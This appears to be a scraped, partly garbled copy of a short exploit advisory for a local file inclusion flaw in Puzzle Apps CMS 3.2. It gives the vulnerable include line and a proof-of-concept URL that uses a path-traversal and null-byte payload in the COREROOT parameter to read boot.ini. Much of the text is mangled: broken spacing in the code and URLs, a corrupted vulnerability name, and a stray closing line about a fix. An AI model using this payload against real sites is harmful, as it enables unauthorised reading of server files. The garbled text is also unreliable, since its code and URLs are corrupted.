#------------------------------------------------------------------------
# Software ...... Apps CMS 3.2
# Vulnerability ...... Local File transfer sion
# Site ...... http://www.puzzleapps.org/
# Download Link ...... http://sourceforge.net/projects/puzzlecms/files/puzzlecms/Puzzle Apps CMS 3.2/puzzle-3.2.tar.gz/download
# Discovery Date...
# Tested On...
#------------------------------------------------------------------------
# Author...
# Site ...... http://www.treasuresec.com/
# Email ...... Treasure Priyamal <treasure@treasuresec.com>
#------------------------------------------------------------------------
#
#
# -- Description --
#
# In Puzzle App CMS there are couple of the places you will be able to find
# LFI vulns.
#
#
# -- Vulnerable Source
# Include_once ($ COREROOT. "config/loader. config. php ");
#
# -- Sample to LFI --
#
# Http://www.bkjia.com/puzzle/core/config.loader.php? COREROOT = [LFI]
#
#
# -- PoC LFI --
#
# Http://www.bkjia.com/puzzle/core/config.loader.php? COREROOT =.../../boot. ini % 00
#
Fixed: it is only for filtering.